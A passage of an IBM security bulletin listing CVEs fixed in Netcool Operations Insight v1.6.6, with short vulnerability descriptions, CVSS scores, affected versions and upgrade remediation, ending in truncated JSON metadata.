CVSS Temporal Score: See [https://exchange.xforce.ibmcloud.com/vulnerabilities/213016](<https://exchange.xforce.ibmcloud.com/vulnerabilities/213016>) for the current score.
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

**CVEID:** [CVE-2021-41772](<https://vulners.com/cve/CVE-2021-41772>)
**DESCRIPTION:** Golang Go is vulnerable to a denial of service, caused by an out-of-bounds slice situation in the Reader.Open function. By using a specially-crafted ZIP archive containing an invalid name or an empty filename field, a remote attacker could exploit this vulnerability to cause a panic, resulting in a denial of service condition.
CVSS Base score: 7.5
CVSS Temporal Score: See [https://exchange.xforce.ibmcloud.com/vulnerabilities/213019](<https://exchange.xforce.ibmcloud.com/vulnerabilities/213019>) for the current score.
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

**CVEID:** [CVE-2021-44716](<https://vulners.com/cve/CVE-2021-44716>)
**DESCRIPTION:** Golang Go is vulnerable to a denial of service, caused by uncontrolled memory consumption in the header canonicalization cache in net/http. By sending HTTP/2 requests, a remote attacker could exploit this vulnerability to consume all available memory resources.
CVSS Base score: 7.5
CVSS Temporal Score: See [https://exchange.xforce.ibmcloud.com/vulnerabilities/216553](<https://exchange.xforce.ibmcloud.com/vulnerabilities/216553>) for the current score.
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

**CVEID:** [CVE-2022-23772](<https://vulners.com/cve/CVE-2022-23772>)
**DESCRIPTION:** Golang Go is vulnerable to a denial of service, caused by a buffer overflow in the Rat.SetString function in math/big.
By sending a specially-crafted request, an attacker could exploit this vulnerability to consume a large amount of RAM and cause the application to crash.
CVSS Base score: 7.5
CVSS Temporal Score: See [https://exchange.xforce.ibmcloud.com/vulnerabilities/219442](<https://exchange.xforce.ibmcloud.com/vulnerabilities/219442>) for the current score.
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

**CVEID:** [CVE-2022-23773](<https://vulners.com/cve/CVE-2022-23773>)
**DESCRIPTION:** An unspecified error in cmd/go in Golang Go, which does not treat branches with semantic-version names as releases, has an unknown impact and attack vector.
CVSS Base score: 5.3
CVSS Temporal Score: See [https://exchange.xforce.ibmcloud.com/vulnerabilities/219443](<https://exchange.xforce.ibmcloud.com/vulnerabilities/219443>) for the current score.
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N)

**CVEID:** [CVE-2022-23806](<https://vulners.com/cve/CVE-2022-23806>)
**DESCRIPTION:** Golang Go is vulnerable to a denial of service, caused by the IsOnCurve function returning true for invalid field elements. By sending a specially-crafted request, an attacker could exploit this vulnerability to cause a panic in ScalarMult, resulting in a denial of service condition.
CVSS Base score: 7.5
CVSS Temporal Score: See [https://exchange.xforce.ibmcloud.com/vulnerabilities/219444](<https://exchange.xforce.ibmcloud.com/vulnerabilities/219444>) for the current score.
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

**CVEID:** [CVE-2022-24675](<https://vulners.com/cve/CVE-2022-24675>)
**DESCRIPTION:** Golang Go is vulnerable to a denial of service, caused by a stack-based buffer overflow in the Decode feature of encoding/pem. By sending a specially-crafted request, a remote attacker could exploit this vulnerability to cause the program to crash.
CVSS Base score: 7.5
CVSS Temporal Score: See [https://exchange.xforce.ibmcloud.com/vulnerabilities/224866](<https://exchange.xforce.ibmcloud.com/vulnerabilities/224866>) for the current score.
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

**CVEID:** [CVE-2022-24921](<https://vulners.com/cve/CVE-2022-24921>)
**DESCRIPTION:** Golang Go is vulnerable to a denial of service, caused by improper input validation. By using a specially-crafted deeply nested expression, a remote attacker could exploit this vulnerability to cause goroutine stack exhaustion, resulting in a denial of service condition.
CVSS Base score: 7.5
CVSS Temporal Score: See [https://exchange.xforce.ibmcloud.com/vulnerabilities/221503](<https://exchange.xforce.ibmcloud.com/vulnerabilities/221503>) for the current score.
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

**CVEID:** [CVE-2022-28327](<https://vulners.com/cve/CVE-2022-28327>)
**DESCRIPTION:** Golang Go is vulnerable to a denial of service, caused by improper input validation by the generic P-256 feature in crypto/elliptic. By sending a specially-crafted request with a long scalar input, a remote attacker could exploit this vulnerability to cause a panic on the system.
CVSS Base score: 7.5
CVSS Temporal Score: See [https://exchange.xforce.ibmcloud.com/vulnerabilities/224871](<https://exchange.xforce.ibmcloud.com/vulnerabilities/224871>) for the current score.
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

**CVEID:** [CVE-2014-0114](<https://vulners.com/cve/CVE-2014-0114>)
**DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by the failure to restrict the setting of Class Loader attributes. An attacker could exploit this vulnerability using the class parameter of an ActionForm object to manipulate the ClassLoader and execute arbitrary code on the system.
CVSS Base score: 7.5
CVSS Temporal Score: See [https://exchange.xforce.ibmcloud.com/vulnerabilities/92889](<https://exchange.xforce.ibmcloud.com/vulnerabilities/92889>) for the current score.
CVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P)

**CVEID:** [CVE-2019-10086](<https://vulners.com/cve/CVE-2019-10086>)
**DESCRIPTION:** Apache Commons Beanutils could allow a remote attacker to gain unauthorized access to the system, caused by the failure to suppress the class property in bean introspection by default. An attacker could exploit this vulnerability to gain unauthorized access to the classloader.
CVSS Base score: 5.3
CVSS Temporal Score: See [https://exchange.xforce.ibmcloud.com/vulnerabilities/166353](<https://exchange.xforce.ibmcloud.com/vulnerabilities/166353>) for the current score.
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N)

**CVEID:** [CVE-2020-13956](<https://vulners.com/cve/CVE-2020-13956>)
**DESCRIPTION:** Apache HttpClient could allow a remote attacker to bypass security restrictions, caused by the improper handling of a malformed authority component in request URIs. By passing request URIs to the library as a java.net.URI object, an attacker could exploit this vulnerability to make the library pick the wrong target host for request execution.
CVSS Base score: 5.3
CVSS Temporal Score: See [https://exchange.xforce.ibmcloud.com/vulnerabilities/189572](<https://exchange.xforce.ibmcloud.com/vulnerabilities/189572>) for the current score.
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N)

**CVEID:** [CVE-2021-29425](<https://vulners.com/cve/CVE-2021-29425>)
**DESCRIPTION:** Apache Commons IO could allow a remote attacker to traverse directories on the system, caused by improper input validation by the FileNameUtils.normalize method. An attacker could send a specially-crafted URL request containing "dot dot" sequences (/../) to view arbitrary files on the system.
CVSS Base score: 7.5
CVSS Temporal Score: See [https://exchange.xforce.ibmcloud.com/vulnerabilities/199852](<https://exchange.xforce.ibmcloud.com/vulnerabilities/199852>) for the current score.
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)

**CVEID:** [CVE-2021-21409](<https://vulners.com/cve/CVE-2021-21409>)
**DESCRIPTION:** Netty is vulnerable to request smuggling, caused by improper validation of requests due to missing validation of content-length. By sending a specially-crafted request, an attacker could exploit this vulnerability to poison a web cache, perform an XSS attack, or obtain sensitive information from the request.
CVSS Base score: 7.3
CVSS Temporal Score: See [https://exchange.xforce.ibmcloud.com/vulnerabilities/199150](<https://exchange.xforce.ibmcloud.com/vulnerabilities/199150>) for the current score.
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)

**CVEID:** [CVE-2021-21295](<https://vulners.com/cve/CVE-2021-21295>)
**DESCRIPTION:** Netty is vulnerable to HTTP request smuggling, caused by improper validation of the Content-Length header by the Http2MultiplexHandler. By sending specially-crafted HTTP request headers, an attacker could exploit this vulnerability to poison a web cache, perform an XSS attack, or obtain sensitive information from the request.
CVSS Base score: 6.5
CVSS Temporal Score: See [https://exchange.xforce.ibmcloud.com/vulnerabilities/197999](<https://exchange.xforce.ibmcloud.com/vulnerabilities/197999>) for the current score.
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N)

**CVEID:** [CVE-2021-21290](<https://vulners.com/cve/CVE-2021-21290>)
**DESCRIPTION:** Netty could allow a local authenticated attacker to obtain sensitive information, caused by an insecure temp file on Unix-like systems. By sending a specially-crafted request, an attacker could exploit this vulnerability to obtain sensitive information.
CVSS Base score: 3.3
CVSS Temporal Score: See [https://exchange.xforce.ibmcloud.com/vulnerabilities/197110](<https://exchange.xforce.ibmcloud.com/vulnerabilities/197110>) for the current score.
CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N)

**CVEID:** [CVE-2016-1000023](<https://vulners.com/cve/CVE-2016-1000023>)
**DESCRIPTION:** Minimatch is vulnerable to a denial of service, caused by a regular expression in minimatch.js. By using a specially-crafted glob pattern, a remote attacker could exploit this vulnerability to cause the application to consume an overly large amount of CPU resources.
CVSS Base score: 7.5
CVSS Temporal Score: See [https://exchange.xforce.ibmcloud.com/vulnerabilities/118817](<https://exchange.xforce.ibmcloud.com/vulnerabilities/118817>) for the current score.
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

**CVEID:** [CVE-2022-24839](<https://vulners.com/cve/CVE-2022-24839>)
**DESCRIPTION:** Sparkle Motion Nokogiri is vulnerable to a denial of service, caused by a java.lang.OutOfMemoryError exception when parsing ill-formed HTML markup in the fork of org.cyberneko.html. By sending a specially-crafted request, a remote attacker could exploit this vulnerability to cause a denial of service condition.
CVSS Base score: 7.5
CVSS Temporal Score: See [https://exchange.xforce.ibmcloud.com/vulnerabilities/224089](<https://exchange.xforce.ibmcloud.com/vulnerabilities/224089>) for the current score.
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

**CVEID:** [CVE-2022-24329](<https://vulners.com/cve/CVE-2022-24329>)
**DESCRIPTION:** JetBrains Kotlin could provide weaker than expected security, caused by failing to lock dependencies for Multiplatform Gradle Projects. A remote attacker could exploit this vulnerability to launch further attacks on the system.
CVSS Base score: 5.3
CVSS Temporal Score: See [https://exchange.xforce.ibmcloud.com/vulnerabilities/220617](<https://exchange.xforce.ibmcloud.com/vulnerabilities/220617>) for the current score.
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N)

**CVEID:** [CVE-2021-31566](<https://vulners.com/cve/CVE-2021-31566>)
**DESCRIPTION:** libarchive could allow a local attacker to gain elevated privileges on the system, caused by an improper link resolution flaw. By using a specially-crafted archive file, an attacker could exploit this vulnerability to change modes, times, access control lists, and flags of a file on the system to gain elevated privileges.
CVSS Base score: 4.4
CVSS Temporal Score: See [https://exchange.xforce.ibmcloud.com/vulnerabilities/222218](<https://exchange.xforce.ibmcloud.com/vulnerabilities/222218>) for the current score.
CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L)

**CVEID:** [CVE-2021-23177](<https://vulners.com/cve/CVE-2021-23177>)
**DESCRIPTION:** libarchive could allow a local attacker to gain elevated privileges on the system, caused by an improper link resolution flaw. By using a specially-crafted archive file, an attacker could exploit this vulnerability to change the ACL of a file on the system and gain elevated privileges.
CVSS Base score: 6.6
CVSS Temporal Score: See [https://exchange.xforce.ibmcloud.com/vulnerabilities/222216](<https://exchange.xforce.ibmcloud.com/vulnerabilities/222216>) for the current score.
CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:L)

**CVEID:** [CVE-2021-3634](<https://vulners.com/cve/CVE-2021-3634>)
**DESCRIPTION:** libssh is vulnerable to a heap-based buffer overflow, caused by improper bounds checking. By sending a specially-crafted request, a remote authenticated attacker could overflow a buffer and execute arbitrary code on the system or cause the application to crash.
CVSS Base score: 5.4
CVSS Temporal Score: See [https://exchange.xforce.ibmcloud.com/vulnerabilities/208281](<https://exchange.xforce.ibmcloud.com/vulnerabilities/208281>) for the current score.
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:L)

**CVEID:** [CVE-2020-13949](<https://vulners.com/cve/CVE-2020-13949>)
**DESCRIPTION:** Apache Thrift is vulnerable to a denial of service, caused by improper input validation. By sending specially-crafted messages, a remote attacker could exploit this vulnerability to cause a large memory allocation.
CVSS Base score: 7.5
CVSS Temporal Score: See [https://exchange.xforce.ibmcloud.com/vulnerabilities/196738](<https://exchange.xforce.ibmcloud.com/vulnerabilities/196738>) for the current score.
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

**CVEID:** [CVE-2022-23308](<https://vulners.com/cve/CVE-2022-23308>)
**DESCRIPTION:** libxml2 is vulnerable to a denial of service, caused by a use-after-free in the ID and IDREF attributes. A remote attacker could exploit this vulnerability to cause a denial of service.
CVSS Base score: 5.3
CVSS Temporal Score: See [https://exchange.xforce.ibmcloud.com/vulnerabilities/220772](<https://exchange.xforce.ibmcloud.com/vulnerabilities/220772>) for the current score.
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L)

**CVEID:** [CVE-2022-25878](<https://vulners.com/cve/CVE-2022-25878>)
**DESCRIPTION:** Node.js protobufjs module could allow a remote attacker to execute arbitrary code on the system, caused by a prototype pollution flaw. By adding or modifying properties of Object.prototype using a __proto__ or constructor payload, an attacker could exploit this vulnerability to execute arbitrary code or cause a denial of service condition on the system.
CVSS Base score: 8.2
CVSS Temporal Score: See [https://exchange.xforce.ibmcloud.com/vulnerabilities/227327](<https://exchange.xforce.ibmcloud.com/vulnerabilities/227327>) for the current score.
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L)

**CVEID:** [CVE-2022-0155](<https://vulners.com/cve/CVE-2022-0155>)
**DESCRIPTION:** follow-redirects could allow a remote attacker to obtain sensitive information, caused by exposure of private personal information to an unauthorized actor. By sending a specially-crafted request, a remote authenticated attacker could exploit this vulnerability to obtain private personal information and use this information to launch further attacks against the affected system.
CVSS Base score: 8
CVSS Temporal Score: See [https://exchange.xforce.ibmcloud.com/vulnerabilities/216974](<https://exchange.xforce.ibmcloud.com/vulnerabilities/216974>) for the current score.
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H)

**CVEID:** [CVE-2022-0536](<https://vulners.com/cve/CVE-2022-0536>)
**DESCRIPTION:** Node.js follow-redirects module could allow a remote authenticated attacker to obtain sensitive information, caused by leakage of the Authorization header to the same hostname during an HTTPS to HTTP redirection. By using man-in-the-middle attack techniques, an attacker could exploit this vulnerability to obtain Authorization header information and use this information to launch further attacks against the affected system.
CVSS Base score: 2.6
CVSS Temporal Score: See [https://exchange.xforce.ibmcloud.com/vulnerabilities/219551](<https://exchange.xforce.ibmcloud.com/vulnerabilities/219551>) for the current score.
CVSS Vector: (CVSS:3.0/AV:A/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N)

**CVEID:** [CVE-2021-44878](<https://vulners.com/cve/CVE-2021-44878>)
**DESCRIPTION:** pac4j could allow a remote attacker to bypass security restrictions, caused by improper validation of ID Tokens with the "none" algorithm.
By injecting a specially-crafted ID token using "none" as the value of the "alg" key, an attacker could exploit this vulnerability to bypass the token validation.
CVSS Base score: 7.5
CVSS Temporal Score: See [https://exchange.xforce.ibmcloud.com/vulnerabilities/216856](<https://exchange.xforce.ibmcloud.com/vulnerabilities/216856>) for the current score.
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N)

**CVEID:** [CVE-2022-29622](<https://vulners.com/cve/CVE-2022-29622>)
**DESCRIPTION:** Node.js Formidable module could allow a remote attacker to upload arbitrary files, caused by the improper validation of file extensions. By sending a specially-crafted HTTP request using the filename parameter, an attacker could exploit this vulnerability to upload a malicious PDF file, which could allow the attacker to execute arbitrary code on the vulnerable system.
CVSS Base score: 9.8
CVSS Temporal Score: See [https://exchange.xforce.ibmcloud.com/vulnerabilities/226582](<https://exchange.xforce.ibmcloud.com/vulnerabilities/226582>) for the current score.
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

**CVEID:** [CVE-2020-17530](<https://vulners.com/cve/CVE-2020-17530>)
**DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. By sending specially-crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system.
CVSS Base score: 8.1
CVSS Temporal Score: See [https://exchange.xforce.ibmcloud.com/vulnerabilities/192743](<https://exchange.xforce.ibmcloud.com/vulnerabilities/192743>) for the current score.
CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)

**CVEID:** [CVE-2021-3807](<https://vulners.com/cve/CVE-2021-3807>)
**DESCRIPTION:** Chalk ansi-regex module for Node.js is vulnerable to a denial of service, caused by a regular expression denial of service (ReDoS) flaw. By sending specially-crafted regex input, a remote attacker could exploit this vulnerability to cause a denial of service condition.
CVSS Base score: 7.5
CVSS Temporal Score: See [https://exchange.xforce.ibmcloud.com/vulnerabilities/209596](<https://exchange.xforce.ibmcloud.com/vulnerabilities/209596>) for the current score.
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

**CVEID:** [CVE-2022-24785](<https://vulners.com/cve/CVE-2022-24785>)
**DESCRIPTION:** Moment.js could allow a remote attacker to traverse directories on the system, caused by improper validation of user-supplied input. An attacker could send a specially-crafted locale string containing "dot dot" sequences (/../) to switch to an arbitrary moment locale.
CVSS Base score: 7.5
CVSS Temporal Score: See [https://exchange.xforce.ibmcloud.com/vulnerabilities/223451](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223451>) for the current score.
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N)

**CVEID:** [CVE-2020-36327](<https://vulners.com/cve/CVE-2020-36327>)
**DESCRIPTION:** Bundler could allow a remote attacker to execute arbitrary code on the system, caused by a flaw when choosing a dependency source. By using a specially-crafted gem, an attacker could exploit this vulnerability to execute arbitrary code on the system.
CVSS Base score: 9.8
CVSS Temporal Score: See [https://exchange.xforce.ibmcloud.com/vulnerabilities/201080](<https://exchange.xforce.ibmcloud.com/vulnerabilities/201080>) for the current score.
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

**CVEID:** [CVE-2022-23219](<https://vulners.com/cve/CVE-2022-23219>)
**DESCRIPTION:** GNU C Library (aka glibc) is vulnerable to a stack-based buffer overflow, caused by improper bounds checking by the clnt_create function in the sunrpc module. By sending a specially-crafted hostname argument, a local attacker could overflow a buffer and execute arbitrary code or cause a denial of service on the system.
CVSS Base score: 8.4
CVSS Temporal Score: See [https://exchange.xforce.ibmcloud.com/vulnerabilities/217303](<https://exchange.xforce.ibmcloud.com/vulnerabilities/217303>) for the current score.
CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

**CVEID:** [CVE-2021-3999](<https://vulners.com/cve/CVE-2021-3999>)
**DESCRIPTION:** GNU glibc is vulnerable to an off-by-one buffer overflow and underflow, caused by improper bounds checking by the getcwd() function. By sending a specially-crafted request, a local authenticated attacker could overflow a buffer and execute arbitrary code on the system.
CVSS Base score: 8.4
CVSS Temporal Score: See [https://exchange.xforce.ibmcloud.com/vulnerabilities/217981](<https://exchange.xforce.ibmcloud.com/vulnerabilities/217981>) for the current score.
CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

**CVEID:** [CVE-2022-23218](<https://vulners.com/cve/CVE-2022-23218>)
**DESCRIPTION:** GNU C Library (aka glibc) is vulnerable to a stack-based buffer overflow, caused by improper bounds checking by the svcunix_create function in the sunrpc module. By sending a specially-crafted path argument, a local attacker could overflow a buffer and execute arbitrary code or cause a denial of service on the system.
CVSS Base score: 8.4
CVSS Temporal Score: See [https://exchange.xforce.ibmcloud.com/vulnerabilities/217302](<https://exchange.xforce.ibmcloud.com/vulnerabilities/217302>) for the current score.
CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

**CVEID:** [CVE-2022-22822](<https://vulners.com/cve/CVE-2022-22822>)
**DESCRIPTION:** Expat could allow a remote attacker to execute arbitrary code on the system, caused by an integer overflow of addBinding in xmlparse.c. By persuading a victim to open a specially-crafted file, an attacker could exploit this vulnerability to execute arbitrary code on the system.
CVSS Base score: 7.8
CVSS Temporal Score: See [https://exchange.xforce.ibmcloud.com/vulnerabilities/216908](<https://exchange.xforce.ibmcloud.com/vulnerabilities/216908>) for the current score.
CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H)

**CVEID:** [CVE-2022-22823](<https://vulners.com/cve/CVE-2022-22823>)
**DESCRIPTION:** Expat could allow a remote attacker to execute arbitrary code on the system, caused by an integer overflow of build_model in xmlparse.c. By persuading a victim to open a specially-crafted file, an attacker could exploit this vulnerability to execute arbitrary code on the system.
CVSS Base score: 7.8
CVSS Temporal Score: See [https://exchange.xforce.ibmcloud.com/vulnerabilities/216907](<https://exchange.xforce.ibmcloud.com/vulnerabilities/216907>) for the current score.
CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H)

**CVEID:** [CVE-2022-22824](<https://vulners.com/cve/CVE-2022-22824>)
**DESCRIPTION:** Expat could allow a remote attacker to execute arbitrary code on the system, caused by an integer overflow of defineAttribute in xmlparse.c. By persuading a victim to open a specially-crafted file, an attacker could exploit this vulnerability to execute arbitrary code on the system.
CVSS Base score: 7.8
CVSS Temporal Score: See [https://exchange.xforce.ibmcloud.com/vulnerabilities/216906](<https://exchange.xforce.ibmcloud.com/vulnerabilities/216906>) for the current score.
CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H)

**CVEID:** [CVE-2022-23852](<https://vulners.com/cve/CVE-2022-23852>)
**DESCRIPTION:** Expat (aka libexpat) could allow a remote attacker to execute arbitrary code on the system, caused by an integer overflow in the XML_GetBuffer function. By sending a specially-crafted request, an attacker could exploit this vulnerability to execute arbitrary code on the system.
CVSS Base score: 9.8
CVSS Temporal Score: See [https://exchange.xforce.ibmcloud.com/vulnerabilities/218007](<https://exchange.xforce.ibmcloud.com/vulnerabilities/218007>) for the current score.
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

**CVEID:** [CVE-2022-25235](<https://vulners.com/cve/CVE-2022-25235>)
**DESCRIPTION:** libexpat is vulnerable to a denial of service, caused by improper input validation in xmltok_impl.c. By persuading a victim to open specially-crafted content with malformed encoding, a remote attacker could exploit this vulnerability to cause a denial of service condition.
CVSS Base score: 3.3
CVSS Temporal Score: See [https://exchange.xforce.ibmcloud.com/vulnerabilities/219782](<https://exchange.xforce.ibmcloud.com/vulnerabilities/219782>) for the current score.
CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L)

**CVEID:** [CVE-2022-25236](<https://vulners.com/cve/CVE-2022-25236>)
**DESCRIPTION:** libexpat is vulnerable to a denial of service, caused by improper protection against insertion of namesep characters into namespace URIs in xmlparse.c. By sending a specially-crafted request, a remote attacker could exploit this vulnerability to cause a denial of service condition.
CVSS Base score: 5.3
CVSS Temporal Score: See [https://exchange.xforce.ibmcloud.com/vulnerabilities/219784](<https://exchange.xforce.ibmcloud.com/vulnerabilities/219784>) for the current score.
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L)

**CVEID:** [CVE-2022-25315](<https://vulners.com/cve/CVE-2022-25315>)
**DESCRIPTION:** libexpat could allow a remote attacker to execute arbitrary code on the system, caused by an integer overflow in storeRawNames. By persuading a victim to open a specially-crafted file, an attacker could overflow a buffer and execute arbitrary code on the system.
CVSS Base score: 7.8
CVSS Temporal Score: See [https://exchange.xforce.ibmcloud.com/vulnerabilities/219945](<https://exchange.xforce.ibmcloud.com/vulnerabilities/219945>) for the current score.
CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H)

**CVEID:** [CVE-2022-22825](<https://vulners.com/cve/CVE-2022-22825>)
**DESCRIPTION:** Expat could allow a remote attacker to execute arbitrary code on the system, caused by an integer overflow of lookup in xmlparse.c. By persuading a victim to open a specially-crafted file, an attacker could exploit this vulnerability to execute arbitrary code on the system.
CVSS Base score: 7.8
CVSS Temporal Score: See [https://exchange.xforce.ibmcloud.com/vulnerabilities/216905](<https://exchange.xforce.ibmcloud.com/vulnerabilities/216905>) for the current score.
CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H)

**CVEID:** [CVE-2021-23358](<https://vulners.com/cve/CVE-2021-23358>)
**DESCRIPTION:** Node.js underscore module could allow a remote attacker to execute arbitrary code on the system, caused by a flaw in the template function. By sending a specially-crafted argument using the variable property, an attacker could exploit this vulnerability to execute arbitrary code on the system.
CVSS Base score: 9.8
CVSS Temporal Score: See [https://exchange.xforce.ibmcloud.com/vulnerabilities/198958](<https://exchange.xforce.ibmcloud.com/vulnerabilities/198958>) for the current score.
\nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2021-3765](<https://vulners.com/cve/CVE-2021-3765>) \n** DESCRIPTION: **validator.js is vulnerable to a denial of service, caused by a regular expression denial of service (ReDoS) flaw when calling the rtrim function. By sending a specially-crafted regex input, a remote attacker could exploit this vulnerability to cause a denial of service condition. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/212669](<https://exchange.xforce.ibmcloud.com/vulnerabilities/212669>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nNetcool Operations Insight| 1.4.x \nNetcool Operations Insight| 1.5.x \nNetcool Operations Insight| 1.6.x \n \n\n\n## Remediation/Fixes\n\nNetcool Operations Insight v1.6.6 can be deployed on-premises, on a supported cloud platform, or on a hybrid cloud and on-premises architecture. 
\n\nIBM strongly suggests the following remediation / fixes:\n\nPlease go to [https://www.ibm.com/docs/en/noi/1.6.6?topic=installing](<https://www.ibm.com/docs/en/noi/1.6.4?topic=installing>) to follow the installation instructions relevant to your chosen architecture.\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-25T13:11:39", "type": "ibm", "title": "Security Bulletin: Netcool Operations Insight v1.6.6 contains fixes for multiple security vulnerabilities.", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0114", "CVE-2016-1000023", "CVE-2019-10086", "CVE-2020-13949", "CVE-2020-13956", "CVE-2020-14039", "CVE-2020-15586", "CVE-2020-16845", "CVE-2020-17530", "CVE-2020-24553", "CVE-2020-28362", "CVE-2020-28366", "CVE-2020-28367", "CVE-2020-36327", "CVE-2020-7919", "CVE-2021-21290", "CVE-2021-21295", "CVE-2021-21409", "CVE-2021-22144", "CVE-2021-23177", "CVE-2021-23358", "CVE-2021-23450", "CVE-2021-27918", "CVE-2021-29425", "CVE-2021-29923", "CVE-2021-3114", "CVE-2021-31525", "CVE-2021-31566", "CVE-2021-31805", "CVE-2021-33195", 
